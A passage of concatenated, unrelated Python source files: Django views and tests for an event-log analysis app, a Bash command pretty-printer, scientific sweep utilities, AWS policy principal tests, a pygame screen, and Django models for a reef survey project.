day = STAGE_END_DAY['test']
train_df, test_df = df.loc[df.date_ != day, :], df.loc[df.date_ == day, :]
feature_columns = DENSE_FEATURE_COLUMNS + SPARSE_FEATURE_COLUMNS + \
VARLEN_SPARSE_FEATURE_COLUMNS + list(WEIGHT_NAME.values())
train_x, train_y = train_df[feature_columns], train_df[action]
test_x, test_y = test_df[feature_columns], test_df[action]
return train_x, train_y, test_x, test_y
|
'''
Selection Sort
Time Complexity: O(N*N)
Space Complexity: 1
'''
from algorithms.Algorithm import Algorithm
class SelectionSort(Algorithm):
def __init__(self):
super().__init__("Selection Sort")
def algorithm(self):
for i in range(len(self.array)):
min_index = i
for j in range(i+1, len(self.array)):
if self.array[j] < self.array[min_index]:
min_index = j
self.array[i], self.array[min_index] = self.array[min_index], self.array[i]
#visualise the sorting
self.update(i, min_index)
|
from django.views.generic import TemplateView
from rest_framework import views, serializers, status
from rest_framework.response import Response
class Index(TemplateView):
template_name = 'index.html'
class EncuestasIndex(TemplateView):
template_name = 'encuestas.html'
class MessageSerializer(serializers.Serializer):
message = serializers.CharField()
class EchoView(views.APIView):
def post(self, request, *args, **kwargs):
serializer = MessageSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
return Response(
serializer.data, status=status.HTTP_201_CREATED)
|
import os
import zipfile
from pathlib import Path
from django.core.files.base import ContentFile
from django.test import TestCase
from django.test.client import Client
import pandas as pd
from pm4pymdl.objects.ocel.importer import importer as ocel_importer
from apps.index import models
from modules import utils
STANDARD_TEST_LOG = Path("./cache/running-example.jsonocel")
def get_event_log():
if not os.path.exists(STANDARD_TEST_LOG.parent):
os.mkdir(STANDARD_TEST_LOG.parent)
if not os.path.exists(STANDARD_TEST_LOG):
os.system(
"curl ocel-standard.org/1.0/running-example.jsonocel.zip >> "
+ str(STANDARD_TEST_LOG)
+ ".zip"
)
with zipfile.ZipFile(str(STANDARD_TEST_LOG) + ".zip", "r") as zip_ref:
zip_ref.extractall(STANDARD_TEST_LOG.parent)
tuple = ocel_importer.apply(str(STANDARD_TEST_LOG))
#! This is not clean python, Do pull request for pm4pymdl project
if len(tuple) == 2:
df, obj_df = tuple
else:
df = tuple
obj_df = pd.DataFrame()
return df, obj_df
class AbstractTestCase(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.df, cls.obj_df = get_event_log()
def setUp(self):
self.df, self.obj_df = self.__class__.df, self.__class__.obj_df
@classmethod
def save_event_log_to_db(cls):
json_string = utils.apply_json(cls.df, cls.obj_df)
hash, log = utils.event_log_by_hash(json_string)
event_log = models.EventLog.objects.create()
event_log.name = os.path.splitext(STANDARD_TEST_LOG.name)[0]
event_log.file.save(
event_log.name + ".jsonocel",
ContentFile(json_string),
)
event_log.hash = hash
event_log.save()
cls.event_log = event_log
return event_log
class ModelTestCase(AbstractTestCase):
def test_no_duplicate_logs(self):
event_log = self.save_event_log_to_db()
hash_2, log_2 = utils.event_log_by_hash(utils.apply_json(self.df, self.obj_df))
self.assertEqual(event_log.hash, hash_2)
self.assertEqual(event_log.id, log_2.id)
class WebpageAvailabilityTestCase(AbstractTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.save_event_log_to_db()
def setUp(self):
super().setUp()
self.client = Client()
self.event_log = self.__class__.event_log
def test_upload_no_log(self):
response = self.client.get("/")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/upload.html", [template.name for template in response.templates]
)
def test_upload_valid_log(self):
response = self.client.get(f"?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/upload.html", [template.name for template in response.templates]
)
def test_upload_invalid_log(self):
response = self.client.get(f"?id=foo")
self.assertEqual(response.status_code, 404)
def test_filtering_no_log(self):
response = self.client.get("/filtering")
self.assertEqual(response.status_code, 404)
def test_filtering_valid_log(self):
response = self.client.get(f"/filtering?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/filtering.html", [template.name for template in response.templates]
)
self.assertContains(response, self.event_log.name)
self.assertContains(response, 'id="btn-submit"')
self.assertContains(response, 'name="id"')
def test_filtering_invalid_log(self):
response = self.client.get(f"/filtering?id=foo")
self.assertEqual(response.status_code, 404)
def test_filter_no_log(self):
response = self.client.get("/filter")
self.assertEqual(response.status_code, 404)
def test_filter_valid_log(self):
response = self.client.get(f"/filter?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/filter.html", [template.name for template in response.templates]
)
self.assertContains(response, 'id="row-select"')
self.assertContains(response, 'id="column-select"')
self.assertContains(response, 'id="btn-create-cell"')
self.assertContains(response, 'name="id"')
def test_filter_invalid_log(self):
response = self.client.get(f"/filter?id=foo")
self.assertEqual(response.status_code, 404)
def test_visualization_no_log(self):
response = self.client.get("/visualize")
self.assertEqual(response.status_code, 404)
def test_visualization_valid_log(self):
response = self.client.get(f"/visualize?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"vis/vis.html", [template.name for template in response.templates]
)
self.assertContains(response, 'id="btn-dfg-freq"')
self.assertContains(response, 'id="btn-dfg-perf"')
self.assertContains(response, 'id="btn-petri"')
self.assertContains(response, 'name="id"')
def test_visualization_invalid_log(self):
response = self.client.get(f"/visualize?id=foo")
self.assertEqual(response.status_code, 404)
def test_comparative_no_log(self):
response = self.client.get("/comparative")
self.assertEqual(response.status_code, 404)
def test_comparative_valid_log(self):
response = self.client.get(f"/comparative?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertIn(
"index/comparative.html", [template.name for template in response.templates]
)
def test_comparative_invalid_log(self):
response = self.client.get(f"/comparative?id=foo")
self.assertEqual(response.status_code, 404)
class PlotsTestCase(AbstractTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.save_event_log_to_db()
def setUp(self):
super().setUp()
self.client = Client()
self.event_log = self.__class__.event_log
self.longMessage = True
def test_histogram_invalid_id(self):
response = self.client.get(f"/plots/histogram/{self.df.columns[0]}?id=foo")
self.assertEqual(response.status_code, 404)
def test_histogram_invalid_column(self):
response = self.client.get(f"/plots/histogram/foo?id={self.event_log.id}")
self.assertEqual(response.status_code, 404)
def test_histogram_valid_event_columns(self):
a, b, c = utils.get_column_types(self.df)
for column in [*a, *b, *c]:
response = self.client.get(
f"/plots/histogram/{column}?id={self.event_log.id}"
)
self.assertEqual(response.status_code, 200, msg=f"Failed for {column}")
# self.assertContains(response,"<div class=\"plot-container plotly\">")
def test_histogram_valid_object_columns(self):
obj_numerical, obj_categorical, _ = utils.get_column_types(self.obj_df)
for column in [*obj_numerical, *obj_categorical]:
response = self.client.get(
f"/plots/histogram/{column}?id={self.event_log.id}"
)
self.assertEqual(response.status_code, 200)
# self.assertContains(response,"<div class=\"plot-container plotly\">")
def test_dfg_invalid_id(self):
response = self.client.get(f"/plots/dfg?id=foo")
self.assertEqual(response.status_code, 404)
def test_dfg_valid(self):
response = self.client.get(f"/plots/dfg?id={self.event_log.id}")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<img")
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page_test
class ProfileCreator(page_test.PageTest):
"""Base class for an object that constructs a Chrome profile."""
def __init__(self):
super(ProfileCreator, self).__init__()
self._page_set = None
@property
def page_set(self):
return self._page_set
def ValidateAndMeasurePage(self, _, tab, results):
pass
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
import typing as t
__author__ = "Benjamin Kane"
__version__ = "0.1.0"
__doc__ = f"""
Pretty-print simple Bash command from one line of stdin
Examples:
echo 'echo "hi there" | awk "{{print $1}}"' | {sys.argv[0]}
Help:
Please see Benjamin Kane for help.
"""
def parse_args(*args, **kwargs):
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
return parser.parse_args(*args, **kwargs)
# need to tokenize into words, strings, pipes, options
# strings are surrounded by quotes - and can have nested quotes
# pipes are |
# options start with -
# Test with: python3 -m doctest format_shell.py
class Kind:
UNSET = "UNSET"
PIPE = "PIPE"
OPTION = "OPTION"
SINGLE_QUOTE_STRING = "SINGLE_QUOTE_STRING"
DOUBLE_QUOTE_STRING = "DOUBLE_QUOTE_STRING"
CMD = "CMD"
class Token(t.NamedTuple):
text: str
kind: Kind
def tokenize(expr):
"""Return a list of tokens
>>> list(tokenize(''))
[]
>>> list(tokenize(' '))
[]
>>> list(tokenize('|'))
[Token(text='|', kind='PIPE')]
>>> list(tokenize(' | '))
[Token(text='|', kind='PIPE')]
>>> list(tokenize(' | -'))
[Token(text='|', kind='PIPE'), Token(text='-', kind='OPTION')]
>>> list(tokenize(' | -bob'))
[Token(text='|', kind='PIPE'), Token(text='-bob', kind='OPTION')]
>>> list(tokenize(' | -bob "dillon"'))
[Token(text='|', kind='PIPE'), Token(text='-bob', kind='OPTION'), Token(text='"dillon"', kind='DOUBLE_QUOTE_STRING')]
>>> list(tokenize('echo | openssl s_client -connect www.example.com:443'))
[Token(text='echo', kind='CMD'), Token(text='|', kind='PIPE'), Token(text='openssl', kind='CMD'), Token(text='s_client', kind='CMD'), Token(text='-connect', kind='OPTION'), Token(text='www.example.com:443', kind='CMD')]
>>> list(tokenize('"bob'))
Traceback (most recent call last):
...
ValueError: Double quote at column 0 unmatched
>>> list(tokenize('"'))
Traceback (most recent call last):
...
ValueError: Double quote at column 0 unmatched
>>> list(tokenize('" "'))
[Token(text='" "', kind='DOUBLE_QUOTE_STRING')]
>>> list(tokenize('echo "hi there" | awk "{print $1}"'))
[Token(text='echo', kind='CMD'), Token(text='"hi there"', kind='DOUBLE_QUOTE_STRING'), Token(text='|', kind='PIPE'), Token(text='awk', kind='CMD'), Token(text='"{print $1}"', kind='DOUBLE_QUOTE_STRING')]
"""
start = 0
end = 0
kind = Kind.UNSET
len_expr = len(expr) # cache constant value
while True:
# eat whitespace
while end < len_expr and expr[end].isspace():
start += 1
end += 1
if end == len_expr:
return
if expr[end] == "|":
end += 1
yield Token(expr[start:end], Kind.PIPE)
start = end
elif expr[end] == "-":
while end < len_expr and not expr[end].isspace():
end += 1
yield Token(expr[start:end], Kind.OPTION)
start = end
elif expr[end] == '"':
while True:
end += 1
if end == len_expr:
raise ValueError(f"Double quote at column {start} unmatched")
if expr[end] == '"':
break
end += 1
yield Token(expr[start:end], Kind.DOUBLE_QUOTE_STRING)
start = end
elif expr[end] == "'":
while True:
end += 1
if end == len_expr:
raise ValueError(f"Single quote at column {start} unmatched")
if expr[end] == "'":
break
end += 1
yield Token(expr[start:end], Kind.SINGLE_QUOTE_STRING)
start = end
else: # not space, not anything else, must be cmd
while end < len_expr and not expr[end].isspace():
end += 1
yield Token(expr[start:end], Kind.CMD)
start = end
def print_cmd(tokens: t.Iterable[Token]):
for token in tokens:
if token.kind == Kind.PIPE:
print(f"\\\n| ", end="")
elif token.kind == Kind.OPTION:
print(f"\\\n {token.text} ", end="")
elif token.kind in (
Kind.CMD,
Kind.DOUBLE_QUOTE_STRING,
Kind.SINGLE_QUOTE_STRING,
):
print(f"{token.text} ", end="")
else:
raise ValueError(f"Unknown token kind: {token!r}")
print()
def main():
# get --help
parse_args()
command = sys.stdin.readline()
print_cmd(tokenize(command))
if __name__ == "__main__":
main()
|
import os.path
import unittest
import fluteline
import watson_streaming
import watson_streaming.transcriber
import watson_streaming.utilities
CREDENTIALS_PATH = 'credentials.json'
AUDIO_PATH = 'examples/audio_file.wav'
class TestSanity(unittest.TestCase):
def setUp(self):
if os.path.isfile(CREDENTIALS_PATH):
config = watson_streaming.transcriber._parse_credentials(CREDENTIALS_PATH)
else:
config = os.environ['WATSON_APIKEY'], os.environ['WATSON_HOSTNAME']
self.apikey, self.hostname = config
def test_sanity(self):
transcriber = watson_streaming.Transcriber(
settings={'interim_results': True},
apikey=self.apikey,
hostname=self.hostname,
)
file_audio_gen = watson_streaming.utilities.FileAudioGen(AUDIO_PATH)
pipeline = [file_audio_gen, transcriber]
fluteline.connect(pipeline)
fluteline.start(pipeline)
while True:
result = transcriber.output.get()
if 'results' in result:
transcript = result['results'][0]['alternatives'][0]['transcript']
expected = 'several tornadoes'
if transcript.startswith(expected):
break
else:
raise AssertionError("Didn't get expected transcript")
fluteline.stop(pipeline)
|
# Jared Dyreson
# CPSC 386-01
# 2021-11-29
# jareddyreson@csu.fullerton.edu
# @JaredDyreson
#
# Lab 00-04
#
# Some filler text
#
"""
This module contains the Intro display class
"""
import pygame
import functools
import sys
from Invaders.Dataclasses.point import Point
from Invaders.Displays.display import Display
from Invaders.UI.button import Button
class IntroDisplay(Display):
def __init__(self):
super().__init__()
self.logo_position = Point(225, 275)
self.break_from_draw = False
self.buttons = [
Button(
self._display_surface,
Point(300, 600),
300,
50,
"Start",
functools.partial(self.terminate_intro),
),
]
def terminate_intro(self):
"""
Kill the current window
"""
self.break_from_draw = True
def draw(self) -> None:
draw_loop = True
logo = pygame.image.load("assets/logo.png")
while draw_loop and not self.break_from_draw:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
self.draw_image(logo, self.logo_position)
for button in self.buttons:
self.write_text(
button.contents, button.center(), pygame.font.SysFont(None, 30)
)
button.draw()
pygame.display.flip()
|
import numpy as np
from predicu.data import CUM_COLUMNS
from predicu.preprocessing import preprocess_bedcounts
from predicu.tests.utils import load_test_data
def test_bedcounts_data_preprocessing():
test_data = load_test_data()
preprocessed = preprocess_bedcounts(test_data["bedcounts"])
assert len(preprocessed) > 0
for icu_name, dg in preprocessed.groupby("icu_name"):
dg = dg.sort_values(by="date")
for col in CUM_COLUMNS:
diffs = dg[col].diff(1).fillna(0).values
assert np.all(diffs >= 0)
|
import numpy as np
import sys
from scipy import stats
import matplotlib.pyplot as plt
from myfunction import cross_cov
from myfunction import gen_binary_obs
from myfunction import gen_binary
#=========================================================================================
# paramaters:
#l = sys.argv[1] ; t1 = sys.argv[2] ; nh = sys.argv[3]
l = 501 ; t2 = 1260 ; nh = 0
print(l,t2,nh)
l = int(l) ; t2 = int(t2) ; nh = int(nh)
t1 = t2-l
#ext_name = '%02d.dat'%(nh)
ext_name = '%03d_%04d_%02d.dat'%(l,t2,nh)
s0 = np.loadtxt('close_open_binary.txt')
s0 = s0[t1:t2]
c0 = cross_cov(s0[1:],s0[:-1])
#=========================================================================================
w = np.loadtxt('W/w_%s'%ext_name)
h0 = np.loadtxt('W/h0_%s'%ext_name)
n2 = np.shape(w)[0]
if nh > 0:
sh = np.loadtxt('W/sh_%s'%ext_name)
if nh==1:
sh = sh[:,np.newaxis] # convert from (l,) --> (l,1)
n = n2 - nh
nsim = 200
c_isim = np.empty((n,n,nsim))
for isim in range(nsim):
# if nh == 0:
s = gen_binary(w,h0,l) # hidden configuration is NOT fixed
#else:
#s = gen_binary_obs(w,h0,sh)
c = cross_cov(s[1:,:n],s[:-1,:n])
c_isim[:,:,isim] = c
# average of all:
c_av = np.mean(c_isim,axis=2)
c_dev = np.std(c_isim,axis=2)
MSE = np.mean((c0 - c_av)**2)
slope = np.sum(c0*c_av)/np.sum(c0**2)
slope2_av, intercept_av, R_av, p_value, std_err = stats.linregress(c0.flatten(),c_av.flatten())
#--------------------------------------
print(nh,MSE,slope,R_av)
R_out=open('C/R_%s'%ext_name,'w')
R_out.write("% i % f % f % f \n"%(nh,MSE,slope,R_av))
R_out.close()
C_out=open('C/C_%s'%ext_name,'w')
for i in range(n):
for j in range(n):
C_out.write("% i % i % f % f \n"%(i+1, j+1, c0[i,j], c_av[i,j]))
C_out.close()
plt.plot([-0.2,0.2],[-0.2,0.2])
#plt.title('nh=%02d'%nh)
plt.scatter(c0,c_av)
#plt.show()
|
import pytest
from policyglass import EffectivePrincipal, Principal
def test_bad_union():
with pytest.raises(ValueError) as ex:
EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:root")).union(
Principal("AWS", "arn:aws:iam::123456789012:root")
)
assert "Cannot union EffectivePrincipal with Principal" in str(ex.value)
def test_union_simple():
assert EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:root")).union(
EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:role/RoleName"))
) == [EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:root"))]
def test_union_excluded_principal_addition():
"""If we have an inclusion that is a subset of another EffectivePrincipal's exclusions it must not be eliminated.
This is because it represents an additional allow which wasn't subject to the same exclusion in its original
statement. If it had been then it would have self-destructed by its own exclusions.
"""
a = EffectivePrincipal(Principal("AWS", "*"), frozenset({Principal("AWS", "arn:aws:iam::123456789012:root")}))
b = EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:role/RoleName"))
assert a.union(b) == [
EffectivePrincipal(Principal("AWS", "*"), frozenset({Principal("AWS", "arn:aws:iam::123456789012:root")})),
EffectivePrincipal(Principal("AWS", "arn:aws:iam::123456789012:role/RoleName")),
]
def test_union_disjoint():
a = EffectivePrincipal(
Principal("AWS", "arn:aws:iam::123456789012:root"),
frozenset({Principal("AWS", "arn:aws:iam::123456789012:role/RoleName")}),
)
b = EffectivePrincipal(Principal("AWS", "arn:aws:iam::098765432109:root"))
assert a.union(b) == [
EffectivePrincipal(
Principal("AWS", "arn:aws:iam::123456789012:root"),
frozenset({Principal("AWS", "arn:aws:iam::123456789012:role/RoleName")}),
),
EffectivePrincipal(Principal("AWS", "arn:aws:iam::098765432109:root")),
]
|
import tkinter
mainWindow = tkinter.Tk()
mainWindow.title('Hello World')
mainWindow.geometry('640x40')
# text inside using Label widget
label = tkinter.Label(mainWindow, text='Inside the window')
label.pack(side='top')
# create canvas widget inside
canvas = tkinter.Canvas(mainWindow, relief='raised', borderwidth=5)
canvas.pack(side='top', expand=False)
mainWindow.mainloop()
|
# sweep_generators.py
#
# This file is part of scqubits.
#
# Copyright (c) 2019, Jens Koch and Peter Groszkowski
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
############################################################################
import numpy as np
from tqdm.notebook import tqdm
import scqubits.core.sweep_observables as obs
from scqubits.core.spec_lookup import SpectrumLookup
from scqubits.core.storage import SpectrumData
from scqubits.settings import TQDM_KWARGS
def generate_chi_sweep(sweep):
"""Generate data for the AC Stark shift chi as a function of the sweep parameter"""
osc_subsys_list = sweep.hilbertspace.osc_subsys_list
qbt_subsys_list = sweep.hilbertspace.qbt_subsys_list
for osc_index, osc_subsys in osc_subsys_list:
for qbt_index, qubit_subsys in qbt_subsys_list:
sweep.compute_custom_data_sweep('chi_osc{}_qbt{}'.format(osc_index, qbt_index), obs.dispersive_chi,
qubit_subsys=qubit_subsys, osc_subsys=osc_subsys, chi_indices=(1, 0))
def generate_charge_matrixelem_sweep(sweep):
"""Generate data for the charge matrix elements as a function of the sweep parameter"""
for qbt_index, subsys in sweep.hilbertspace.qbt_subsys_list:
if type(subsys).__name__ in ['Transmon', 'Fluxonium']:
sweep.compute_custom_data_sweep('n_op_qbt{}'.format(qbt_index), obs.qubit_matrixelement,
qubit_subsys=subsys, qubit_operator=subsys.n_operator())
# **********************************************************************************************************************
def get_difference_spectrum(sweep, initial_state_ind=0, lookup=None):
"""Takes spectral data of energy eigenvalues and subtracts the energy of a select state, given by its state
index.
Parameters
----------
sweep: ParameterSweep
initial_state_ind: int or (i1, i2, ...)
index of the initial state whose energy is supposed to be subtracted from the spectral data
lookup: SpectrumLookup, optional
Returns
-------
SpectrumData object
"""
lookup = lookup or SpectrumLookup(sweep)
param_count = sweep.param_count
evals_count = sweep.evals_count
diff_eigenenergy_table = np.empty(shape=(param_count, evals_count))
for param_index in tqdm(range(param_count), desc="difference spectrum", **TQDM_KWARGS):
eigenenergies = sweep.dressed_specdata.energy_table[param_index]
if isinstance(initial_state_ind, int):
eigenenergy_index = initial_state_ind
else:
eigenenergy_index = lookup.dressed_index(initial_state_ind, param_index)
diff_eigenenergies = eigenenergies - eigenenergies[eigenenergy_index]
diff_eigenenergy_table[param_index] = diff_eigenenergies
return SpectrumData(sweep.param_name, sweep.param_vals, diff_eigenenergy_table, sweep.hilbertspace.__dict__)
def generate_target_states_list(sweep, initial_state_labels):
"""Based on a bare state label (i1, i2, ...) with i1 being the excitation level of subsystem 1, i2 the
excitation level of subsystem 2 etc., generate a list of new bare state labels. These bare state labels
correspond to target states reached from the given initial one by single-photon qubit transitions. These
are transitions where one of the qubit excitation levels increases at a time. There are no changes in
oscillator photon numbers.
Parameters
----------
sweep: ParameterSweep
initial_state_labels: tuple(int1, int2, ...)
bare-state labels of the initial state whose energy is supposed to be subtracted from the spectral data
Returns
-------
list of tuple"""
target_states_list = []
for subsys_index, qbt_subsys in sweep.hilbertspace.qbt_subsys_list: # iterate through qubit subsystems
initial_qbt_state = initial_state_labels[subsys_index]
for state_label in range(initial_qbt_state + 1, qbt_subsys.truncated_dim):
# for given qubit subsystem, generate target labels by increasing that qubit excitation level
target_labels = list(initial_state_labels)
target_labels[subsys_index] = state_label
target_states_list.append(tuple(target_labels))
return target_states_list
def get_n_photon_qubit_spectrum(sweep, photonnumber, initial_state_labels, lookup=None):
"""
Extracts energies for transitions among qubit states only, while all oscillator subsystems maintain their
excitation level.
Parameters
----------
sweep: ParameterSweep
photonnumber: int
number of photons used in transition
initial_state_labels: tuple(int1, int2, ...)
bare-state labels of the initial state whose energy is supposed to be subtracted from the spectral data
lookup: SpectrumLookup, optional
Returns
-------
SpectrumData object
"""
lookup = lookup or SpectrumLookup(sweep)
target_states_list = generate_target_states_list(sweep, initial_state_labels)
difference_energies_table = []
for param_index in tqdm(range(sweep.param_count), desc="n-photon spectrum", **TQDM_KWARGS):
difference_energies = []
initial_energy = lookup.energy_bare_index(initial_state_labels, param_index)
for target_labels in target_states_list:
target_energy = lookup.energy_bare_index(target_labels, param_index)
if target_energy is None or initial_energy is None:
difference_energies.append(np.NaN)
else:
difference_energies.append((target_energy - initial_energy) / photonnumber)
difference_energies_table.append(difference_energies)
return target_states_list, SpectrumData(sweep.param_name, sweep.param_vals, np.asarray(difference_energies_table),
sweep.hilbertspace.__dict__)
|
#!/usr/bin/env python
import os
import pyfwk
from pyfi.entity.entity.db import EntityDB
# -------------------------------ENTITY-FUND------------------------------#
class EntityFund(pyfwk.Model):
model = None
dbase = None
table = None
columns = None
@staticmethod
def instance():
if not EntityFund.model:
EntityFund.model = EntityFund()
return EntityFund.model
def __init__(self):
self.dbase = EntityDB.instance()
self.table = 'entityfund'
id = pyfwk.DBCol('id', 'INTEGER PRIMARY KEY')
entity = pyfwk.DBCol('entity', 'INTEGER')
category = pyfwk.DBCol('category', 'INTEGER')
fundfamily = pyfwk.DBCol('fundfamily', 'INTEGER')
self.columns = [id, entity, category, fundfamily]
self.validate()
# ----------------------------------MAIN----------------------------------#
def main():
fm = pyfwk.FileManager.instance()
fm.set_root(os.path.dirname(os.path.dirname(__file__)))
ef = EntityFund.instance()
if __name__ == '__main__':
main()
|
"""
This module contains the definition of Preconditions which describes what to do with
the received parameter and does the necessary changes. The preconditions are used to
enable developers skipping or enabling rules based on a set of conditions.
.. warning::
The precondition is for checking that a rule should or shouldn't run, not for
breaking/aborting the execution. To indicate a precondition failure as an error
in the logs, create a precondition which raises an exception if the requirements
doesn't match.
"""
from __future__ import annotations
from abc import ABC, abstractmethod
import logging
from typing import Any, Optional
from hammurabi.rules.abstract import AbstractRule
class Precondition(AbstractRule, ABC):
"""
This class which describes the bare minimum and helper functions for Preconditions.
A precondition defines what and how should be checked/validated before executing a Rule.
Since preconditions are special rules, all the functions available what can be used for
:class:`hammurabi.rules.base.AbstractRule`.
As said, preconditions are special from different angles. While this is not true for
Rules, Preconditions will always have a name, hence giving a name to a Precondition is not
necessary. In case no name given to a precondition, the name will be the name of the class
and " precondition" suffix.
Example usage:
.. code-block:: python
>>> import logging
>>> from typing import Optional
>>> from pathlib import Path
>>> from hammurabi import Precondition
>>>
>>> class IsFileExist(Precondition):
>>> def __init__(self, path: Optional[Path] = None, **kwargs) -> None:
>>> super().__init__(param=path, **kwargs)
>>>
>>> def task(self) -> bool:
>>> return self.param and self.param.exists()
:param name: Name of the rule which will be used for printing
:type name: Optional[str]
:param param: Input parameter of the rule will be used as ``self.param``
:type param: Any
.. note:
Since ``Precondition`` inherits from ``Rule``, the parameter after the name of the
precondition will be used for ``self.param``. This can be handy for interacting
with input parameters.
.. warning:
Although ``Precondition`` inherits from ``Rule``, the pipe and children execution
is intentionally not implemented.
"""
def __init__(self, name: Optional[str] = None, param: Optional[Any] = None) -> None:
name = name or f"{self.__class__.__name__} precondition"
super().__init__(name, param)
def __repr__(self) -> str:
return f'{self.__class__.__name__}(name="{self.name}", param="{self.param}")'
def __str__(self) -> str:
if self.name.endswith("precondition"):
return self.name
return f"{self.name} precondition"
@abstractmethod
def task(self) -> bool:
"""
Abstract method representing how a :func:`hammurabi.rules.base.Precondition.task`
must be parameterized. Any difference in the parameters or return type will result
in pylint/mypy errors.
To be able to use the power of ``pipe`` and ``children``, return
something which can be generally used for other rules as in input.
:return: Returns an output which can be used as an input for other rules
:rtype: Any (usually same as `self.param`'s type)
"""
def execute(self) -> bool:
"""
Execute the precondition.
:raise: ``AssertionError``
:return: None
"""
logging.info('Running task for "%s"', self.name)
self.pre_task_hook()
result = self.task()
self.post_task_hook()
return result
|
from decimal import Decimal
from collections import Counter
from django.contrib.gis.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
from django.core.urlresolvers import reverse
from django.contrib.gis.geos import Point
from global_finprint.annotation.models.observation import Observation, MasterRecord
from global_finprint.annotation.models.video import Video, Assignment
from global_finprint.core.version import VersionInfo
from global_finprint.core.models import AuditableModel
from global_finprint.trip.models import Trip
from global_finprint.habitat.models import ReefHabitat, Substrate, SubstrateComplexity
from mptt.models import MPTTModel, TreeForeignKey
from django.contrib.postgres.fields import ArrayField, JSONField
# todo: move some of these out ot the db?
EQUIPMENT_BAIT_CONTAINER = {
('B', 'Bag'),
('C', 'Cage'),
}
CURRENT_DIRECTION = {
('N', 'North'),
('NE', 'Northeast'),
('E', 'East'),
('SE', 'Southeast'),
('S', 'South'),
('SW', 'Southwest'),
('W', 'West'),
('NW', 'Northwest'),
}
TIDE_CHOICES = {
('F', 'Flood'),
('E', 'Ebb'),
('S', 'Slack'),
('S2F', 'Slack to Flood'),
('S2E', 'Slack to Ebb'),
}
SURFACE_CHOP_CHOICES = {
('L', 'Light'),
('M', 'Medium'),
('H', 'Heavy'),
}
BAIT_TYPE_CHOICES = {
('CHP', 'Chopped'),
('CRS', 'Crushed'),
('WHL', 'Whole'),
}
VISIBILITY_CHOICES = {
('V0-2', 'V0-2'),
('V2-4', 'V2-4'),
('V4-6', 'V4-6'),
('V6-8', 'V6-8'),
('V8-10', 'V8-10'),
('V10+', 'V10+')
}
FIELD_OF_VIEW_CHOICES = {
('FU', 'Facing Up'),
('FD', 'Facing Down'),
('L', 'Limited'),
('O', 'Open')
}
class BaitContainer(models.Model):
# starting seed: cage, bag
type = models.CharField(max_length=32)
def __str__(self):
return u"{0}".format(self.type)
class FrameType(models.Model):
# starting seed: rebar, stainless rebar, PVC, mixed
type = models.CharField(max_length=32)
image = models.ImageField(null=True, blank=True)
def __str__(self):
return u"{0}".format(self.type)
class Equipment(AuditableModel):
camera = models.CharField(max_length=32)
stereo = models.BooleanField(default=False)
frame_type = models.ForeignKey(to=FrameType)
container = models.ForeignKey(to=BaitContainer)
arm_length = models.PositiveIntegerField(null=True, help_text='centimeters')
camera_height = models.PositiveIntegerField(null=True, help_text='centimeters')
def __str__(self):
return u"{0} / {1} / {2}{3}".format(self.frame_type.type,
self.container.type,
self.camera, ' (Stereo)' if self.stereo else '')
class Meta:
verbose_name_plural = "Equipment"
ordering = ['frame_type__type', 'container__type', 'camera']
class EnvironmentMeasure(AuditableModel):
water_temperature = models.DecimalField(null=True, blank=True,
max_digits=4, decimal_places=1,
help_text='C') # C
salinity = models.DecimalField(null=True, blank=True,
max_digits=4, decimal_places=2,
help_text='ppt') # ppt .0
conductivity = models.DecimalField(null=True, blank=True,
max_digits=8, decimal_places=2,
help_text='S/m') # S/m .00
dissolved_oxygen = models.DecimalField(null=True, blank=True,
max_digits=8, decimal_places=1)
current_flow = models.DecimalField(null=True, blank=True,
max_digits=5, decimal_places=2,
help_text='m/s') # m/s .00
current_direction = models.CharField(max_length=2,
null=True, blank=True,
choices=CURRENT_DIRECTION,
help_text='compass direction') # eight point compass
tide_state = models.CharField(max_length=3,
null=True, blank=True,
choices=TIDE_CHOICES)
estimated_wind_speed = models.IntegerField(null=True, blank=True, help_text='Beaufort')
measured_wind_speed = models.IntegerField(null=True, blank=True, help_text='kts')
wind_direction = models.CharField(max_length=2,
null=True, blank=True,
choices=CURRENT_DIRECTION,
help_text='compass direction') # eight point compass
cloud_cover = models.IntegerField(null=True, blank=True, help_text='%') # percentage
surface_chop = models.CharField(max_length=1,
null=True, blank=True,
choices=SURFACE_CHOP_CHOICES)
def __str__(self):
return u'{0} {1}'.format('Env measure for',str(self.set))
class Bait(AuditableModel):
description = models.CharField(max_length=32, help_text='1kg')
type = models.CharField(max_length=3, choices=BAIT_TYPE_CHOICES)
oiled = models.BooleanField(default=False, help_text='20ml menhaden oil')
def __str__(self):
return u'{0} {1}{2}'.format(self.get_type_display(), self.description, ' (m)' if self.oiled else '')
class Meta:
unique_together = ('description', 'type', 'oiled')
# needed for SetTag#get_choices because python doesn't have this somehow (!!!)
def flatten(x):
if type(x) is list:
return [a for i in x for a in flatten(i)]
else:
return [x]
class SetTag(MPTTModel):
name = models.CharField(max_length=50, unique=True)
description = models.TextField(null=True, blank=True)
active = models.BooleanField(
default=True,
help_text='overridden if parent is inactive')
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True)
class MPTTMeta:
